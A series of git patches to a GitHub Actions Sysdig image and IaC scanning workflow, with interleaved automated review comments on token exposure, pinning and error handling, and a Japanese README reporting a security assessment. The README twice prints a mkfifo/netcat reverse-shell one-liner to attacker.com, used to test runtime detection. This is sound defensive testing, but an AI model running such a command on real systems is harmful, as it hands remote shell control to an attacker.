@@ -12,24 +12,33 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (with docker.sock) + name: Build & Scan Docker Images + IaC runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout repository uses: actions/checkout@v3 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - - name: Build vote image + - name: Build Docker images run: | docker build -t vote-image ./vote - docker tag vote-image vote-image:ci + docker build -t worker-image ./worker + docker build -t result-image ./result - - name: Scan Docker image using docker.sock + - name: Scan vote image run: | - docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci + docker run --rm quay.io/sysdig/secure-inline-scan:2 vote-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + + - name: Scan worker image + run: | + docker run --rm quay.io/sysdig/secure-inline-scan:2 worker-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + + - name: Scan result image + run: | + docker run --rm quay.io/sysdig/secure-inline-scan:2 result-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} - name: Scan IaC (k8s-specifications) run: | From 29ff245f6ddc6806f9eaf75356829c01438c1270 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:14:46 +0900 Subject: [PATCH 66/73] Bonus --- .github/workflows/sysdig-scan.yml | 36 ++++++++++++++++++++++--------- 1 file changed, 26 insertions(+), 10 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 41b098fff9..5c511460a7 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Tech Assessment CI +name: Sysdig Tech Assessment CI (CLI Scanner) on: push: 
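Review bot: The three new scan steps pass the API token as a process argument, `--sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }}`, so it lands in the container's recorded command line (`docker inspect`, `ps` inside the container) rather than only in the step environment; the log masker protects the Actions log, not those. The previous revision's `-e SECURE_API_TOKEN` form, set from an `env:` block, was the better shape and should be kept. `quay.io/sysdig/secure-inline-scan:2` is again pulled by a floating tag and, unlike the step it replaces, is run with neither the daemon socket nor a saved tarball, so it presumably has no way to see the `vote-image`, `worker-image` and `result-image` tags that were just built on the host. Three copy-pasted steps that differ only in the image name would read better as one matrix job over the image name.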
@@ -12,7 +12,7 @@ on: jobs: scan: - name: Build & Scan Docker Images + IaC + name: Scan vote/worker/result with CLI Scanner + IaC runs-on: ubuntu-latest steps: 
@@ -22,24 +22,40 @@ jobs: - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - - name: Build Docker images + - name: Build and save Docker images run: | docker build -t vote-image ./vote docker build -t worker-image ./worker docker build -t result-image ./result + docker save vote-image -o vote-image.tar + docker save worker-image -o worker-image.tar + docker save result-image -o result-image.tar - - name: Scan vote image + - name: Download Sysdig CLI Scanner (latest Linux amd64) run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 vote-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" + chmod +x sysdig-cli-scanner - - name: Scan worker image + - name: Scan vote image (.tar) with CLI Scanner run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 worker-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - name: Scan result image + - name: Scan worker image (.tar) with CLI Scanner run: | - docker run --rm quay.io/sysdig/secure-inline-scan:2 result-image --sysdig-token ${{ secrets.SYSDIG_SECURE_TOKEN }} --sysdig-url ${{ secrets.SYSDIG_API_URL }} + ./sysdig-cli-scanner --standalone --input-file worker-image.tar worker-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + + - name: Scan result image (.tar) with CLI Scanner + run: | + ./sysdig-cli-scanner --standalone --input-file result-image.tar result-image:ci + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ 
github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From fd448389edc815f0fc77257b208d2d1458810809 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:21:59 +0900 Subject: [PATCH 67/73] Bonus --- .github/workflows/sysdig-scan.yml | 65 +++++++++++-------------------- 1 file changed, 23 insertions(+), 42 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 5c511460a7..83221702ad 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Tech Assessment CI (CLI Scanner) +name: Sysdig Scan (Official Action) on: push: 
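Review bot: The `Download Sysdig CLI Scanner` step executes whatever the two `curl` calls return, with no version pin, no checksum and no `--fail`: if the inner `curl -s .../latest_version.txt` fails, the URL collapses to `.../sysdig-cli-scanner//linux/amd64/...` and `curl -LO` will save an HTML error body under the name `sysdig-cli-scanner` and `chmod +x` it. Pin the version in a variable, download with `curl -fsSL -o sysdig-cli-scanner "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${SCANNER_VERSION}/linux/amd64/sysdig-cli-scanner"`, and verify a published checksum with `sha256sum -c` before the `chmod +x`, since the binary then runs with `SECURE_API_TOKEN` in its environment. The three image scans run `--standalone` without `--apiurl` while the IaC scan passes `--apiurl`; if standalone mode skips backend policy evaluation, which is presumably the point of the pipeline, that asymmetry deserves a comment.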
@@ -12,50 +12,31 @@ on: jobs: scan: - name: Scan vote/worker/result with CLI Scanner + IaC + name: Docker + IaC Scan via Sysdig Action runs-on: ubuntu-latest steps: - - name: Checkout repository + - name: Checkout source uses: actions/checkout@v3 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v2 - - - name: Build and save Docker images - run: | - docker build -t vote-image ./vote - docker build -t worker-image ./worker - docker build -t result-image ./result - docker save vote-image -o vote-image.tar - docker save worker-image -o worker-image.tar - docker save result-image -o result-image.tar - - - name: Download Sysdig CLI Scanner (latest Linux amd64) - run: | - curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" - chmod +x sysdig-cli-scanner - - - name: Scan vote image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan worker image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file worker-image.tar worker-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan result image (.tar) with CLI Scanner - run: | - ./sysdig-cli-scanner --standalone --input-file result-image.tar result-image:ci - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - - - name: Scan IaC (k8s-specifications) + - name: Build vote Docker image run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker build ./vote -t vote-app:${{ github.sha }} + + - name: Scan vote image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: vote-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + 
sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + + - name: Scan Kubernetes IaC manifests + uses: sysdiglabs/scan-action@v6 + with: + mode: iac + cli-scanner-version: 1.24.2 + iac-scan-path: k8s-specifications + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true From 77a7478282a7b15232286f3e642a2c92258fcf48 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:36:59 +0900 Subject: [PATCH 68/73] Bonus --- .github/workflows/sysdig-scan.yml | 51 +++++++++++++++++++++++-------- 1 file changed, 39 insertions(+), 12 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 83221702ad..2b4f6bbf1c 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,28 +1,31 @@ -name: Sysdig Scan (Official Action) +name: Sysdig Secure Scanning on: push: - branches: - - main - - ci/sysdig-integration + branches: [main, ci/sysdig-integration] pull_request: - branches: - - main - - ci/sysdig-integration + branches: [main, ci/sysdig-integration] jobs: scan: - name: Docker + IaC Scan via Sysdig Action runs-on: ubuntu-latest + name: Scan vote / worker / result + IaC steps: - name: Checkout source uses: actions/checkout@v3 - - name: Build vote Docker image - run: | - docker build ./vote -t vote-app:${{ github.sha }} + # Build Docker images + - name: Build vote image + run: docker build ./vote -t vote-app:${{ github.sha }} + - name: Build worker image + run: docker build ./worker -t worker-app:${{ github.sha }} + + - name: Build result image + run: docker build ./result -t result-app:${{ github.sha }} + + # Scan vote - name: Scan vote image with Sysdig uses: sysdiglabs/scan-action@v6 with: 
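Review bot: `sysdiglabs/scan-action@v6` (and the unchanged `actions/checkout@v3`) are referenced by mutable tags, and the scan action receives `SYSDIG_SECURE_TOKEN`, so a force-moved `v6` tag would run arbitrary code with the token; pin both to a full commit SHA with the version in a trailing comment, e.g. `uses: sysdiglabs/scan-action@<40-hex-commit-sha> # v6`. Tagging the build with `${{ github.sha }}` is a good change. The `cli-scanner-version: 1.24.2` pin appears only on the IaC step and not on the image step; a one-line comment saying why would save the next reader from guessing.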
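Review bot: The workflow still declares no `permissions:` block, so the job runs with the repository's default `GITHUB_TOKEN` permissions, which may include write; since it only checks out, builds and scans, add `permissions: contents: read` at the top level. Adding `pull_request` as a trigger also means runs for pull requests from forks will not receive `secrets.SYSDIG_SECURE_TOKEN`, and with `stop-on-processing-error: true` those runs will presumably fail rather than skip; either guard the scan steps on the secret being non-empty or restrict the trigger. The three near-identical build steps, together with the scan steps that follow them, would be clearer as a `strategy.matrix` over `vote`/`worker`/`result`.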
@@ -30,13 +33,37 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true + cli-scanner-version: 1.22.3 + + # Scan worker + - name: Scan worker image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: worker-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + cli-scanner-version: 1.22.3 + # Scan result + - name: Scan result image with Sysdig + uses: sysdiglabs/scan-action@v6 + with: + image-tag: result-app:${{ github.sha }} + sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} + sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} + stop-on-processing-error: true + cli-scanner-version: 1.22.3 + + # Scan IaC - name: Scan Kubernetes IaC manifests uses: sysdiglabs/scan-action@v6 + continue-on-error: true # IaC scan failure should not block main scan with: mode: iac - cli-scanner-version: 1.24.2 iac-scan-path: k8s-specifications sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true + cli-scanner-version: 1.23.3 + From 74fba984edbb6584da30a18bbc1d4adc59026291 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:42:07 +0900 Subject: [PATCH 69/73] Bonus --- .github/workflows/sysdig-scan.yml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 2b4f6bbf1c..464353d0d5 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -9,7 +9,7 @@ on: jobs: scan: runs-on: ubuntu-latest - name: Scan vote / worker / result + IaC + name: Scan vote / worker / result + IaC (stable, no version pin) steps: - name: Checkout source 
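Review bot: `continue-on-error: true` on the `Scan Kubernetes IaC manifests` step swallows every failure of that step, including the processing errors that `stop-on-processing-error: true` just below it is meant to surface, so the IaC scan can silently stop producing results without the workflow turning red. If the intent is only that IaC findings should not block merges, prefer an input of the action that disables failing on policy evaluation, if it provides one, and keep processing errors fatal. The IaC step pins `cli-scanner-version: 1.23.3` while the three image steps pin `1.22.3`; if that mismatch is deliberate, a comment explaining it would help, and the `1.22.3` block repeated three times is a further argument for a matrix job.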
@@ -33,7 +33,6 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 # Scan worker - name: Scan worker image with Sysdig @@ -43,7 +42,6 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 # Scan result - name: Scan result image with Sysdig @@ -53,17 +51,14 @@ jobs: sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.22.3 - # Scan IaC + # Scan IaC (k8s-specifications) - name: Scan Kubernetes IaC manifests uses: sysdiglabs/scan-action@v6 - continue-on-error: true # IaC scan failure should not block main scan + continue-on-error: true with: mode: iac iac-scan-path: k8s-specifications sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }} sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }} stop-on-processing-error: true - cli-scanner-version: 1.23.3 - From 03252f7465c3bb4c08126093408077932805ab73 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Mon, 21 Jul 2025 03:06:28 +0900 Subject: [PATCH 70/73] Trigger Sysdig CI Scan rerun From f653d0e0df2e2940deea33ca9c96a3d40d485d78 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Mon, 21 Jul 2025 10:23:02 +0900 Subject: [PATCH 71/73] Trigger Sysdig CI Scan rerun From 9c8df114fb27a45d12a28da32d5affd90be7bafd Mon Sep 17 00:00:00 2001 From: Keita Higaki Date: Mon, 21 Jul 2025 10:40:56 +0900 Subject: [PATCH 72/73] Update README.md --- README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/README.md b/README.md index 8516424ba1..a563856d74 100644 --- a/README.md +++ b/README.md 
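Review bot: Removing every `cli-scanner-version` pin means the action fetches whichever scanner release is current at each run, so the job name's "stable, no version pin" claim is inverted: results can change underneath you and an upstream release problem flows straight into the pipeline. If the pinned versions failed to download, record the version that does work and pin that, bumping it deliberately. The hunk also deletes the comment that justified `continue-on-error: true`, leaving an undocumented non-blocking gate; restore it as `continue-on-error: true  # IaC findings are advisory for now; do not block the image scans`.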
@@ -63,3 +63,16 @@ The voting application only accepts one vote per client browser. It does not reg This isn't an example of a properly architected perfectly designed distributed app... it's just a simple example of the various types of pieces and languages you might see (queues, persistent data, etc), and how to deal with them in Docker at a basic level. + + +## 📄 Sysdig Tech Assessment 成果レポート + +このリポジトリでは、Sysdig Secure を活用したセキュリティ検証(IaC / CI/CD / Runtime)を段階的に実施しました。 + +| フェーズ | 内容 | 成果リンク | +|----------|------|-------------| +| A | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) | +| B | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) | +| C | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) | + +成果詳細:[`docs/assessment-report.md`](./docs/assessment-report.md) From e2d8b7c3eeb2955fa971f911eceefaaec0b03e4f Mon Sep 17 00:00:00 2001 From: Keita Higaki Date: Mon, 21 Jul 2025 10:44:42 +0900 Subject: [PATCH 73/73] Update README.md --- README.md | 122 ++++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 115 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index a563856d74..5f09179a37 100644 --- a/README.md +++ b/README.md 
@@ -65,14 +65,122 @@ example of the various types of pieces and languages you might see (queues, pers deal with them in Docker at a basic level. -## 📄 Sysdig Tech Assessment 成果レポート +# 📄 Sysdig TechAssessment - Phase A, B & C 成果レポート このリポジトリでは、Sysdig Secure を活用したセキュリティ検証(IaC / CI/CD / Runtime)を段階的に実施しました。 -| フェーズ | 内容 | 成果リンク | -|----------|------|-------------| -| A | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) | -| B | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) | -| C | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) | +--- -成果詳細:[`docs/assessment-report.md`](./docs/assessment-report.md) +## 📘 フェーズA:IaCおよびRuntime Policies 初期検証 + +### ✅ IaC セキュリティスキャン結果(Sysdig CLI Scanner) + +- スキャン対象: `k8s-specifications/*.yaml` +- 使用ツール: `sysdig-cli-scanner:1.22.4` +- 実行方法: + +```bash +docker run --rm \ + -e SECURE_API_TOKEN=$SYSDIG_SECURE_TOKEN \ + -v $PWD:/iac \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl https://app.au1.sysdig.com \ + --iac scan /iac/k8s-specifications +``` + +| レベル | 件数 | 内容例 | +|--------|------|--------| +| 🔴 High | 25 | RunAsUser=root, writeable rootFS, NET_RAW許可など | +| 🟠 Medium | 55 | CPU/Memory制限なし, latestタグ, readiness probeなしなど | +| 🟡 Low | 40 | runAsNonRoot未設定, liveness未定義など | + +### 🛠 修正アクション(IaC) + +- `securityContext.runAsUser: 1000` +- `readOnlyRootFilesystem: true` +- `capabilities.drop: ["ALL"]` +- `resources.requests/limits` を追加 +- `livenessProbe`, `readinessProbe` を明示 +- PR #409 にて修正済みYAMLをコミット + +### ✅ Runtime Policy 初期実装 + +- 使用ルール: `Reverse Shell Detected` +- ポリシータイプ: Workload Policy +- スコープ: `container.label.io.kubernetes.pod.namespace is default` +- アクション: `Generate Event` +- 実行コマンド: + +```bash +kubectl exec -it vote-XXXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f' +``` + +- Sysdig Secure UI にて検知成功(イベント/プロセス/ユーザー確認済) + +--- + +## 📘 
フェーズB:CI/CD 連携によるセキュリティスキャン + +### ✅ 実施内容概要 + +- GitHub Actions を用いた自動スキャン +- 対象:Voting App(vote / worker / result)のDockerイメージと IaCファイル +- 使用アクション:`sysdiglabs/scan-action@v6` + +### 🔧 技術構成 + +- `.github/workflows/sysdig-scan.yml` +- CLIバージョン:`1.22.3` +- Secret:`SYSDIG_SECURE_TOKEN` +- 設定:`continue-on-error: true` + +### 🐳 Docker イメージスキャン結果 + +| サービス | イメージ | 脆弱性数(Critical) | Policy評価 | +|----------|---------|----------------------|------------| +| vote | vote-app | 113(3件) | ❌ FAILED | +| worker | worker-app | 174(4件) | ❌ FAILED | +| result | result-app | 119(1件) | ❌ FAILED | + +### 📄 IaC スキャン結果 + +| レベル | 件数 | 主な検出内容 | +|--------|------|----------------| +| 🔴 High | 25 | serviceAccount未指定, root実行 など | +| 🟠 Medium | 55 | resource未設定, latestタグなど | +| 🟡 Low | 40 | liveness/readiness probe未定義 | + +--- + +## 📘 フェーズC:Runtime Policy による脅威検知 + +### ✅ 実施内容概要 + +- `Reverse Shell Detected`, `Unexpected Outbound Connection` を有効化 +- namespace=`default` を対象に設定 +- イベント:Generate Event, Capture(Kill optional) + +### 🛠 実施ステップ + +```bash +kubectl exec -it vote-XXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f' +``` + +### 📡 検知ログ(Secure UI) + +- Threat:Reverse Shell Detected +- 実行ユーザー:root +- プロセス:`nc.openbsd`, `sh` +- 状態:Open +- Capture:取得済み + +--- + +## ✅ 結論 + +- ✅ フェーズA:IaC検知 → PR修正、Runtime Policy初期検知を実証 +- ✅ フェーズB:CI/CD自動スキャンパイプライン構築 +- ✅ フェーズC:Runtime脅威の検出とフォレンジック取得に成功 + +レポート作成日: 2025-07-21 +作成者: Higaki(SETechAssessment 参加者)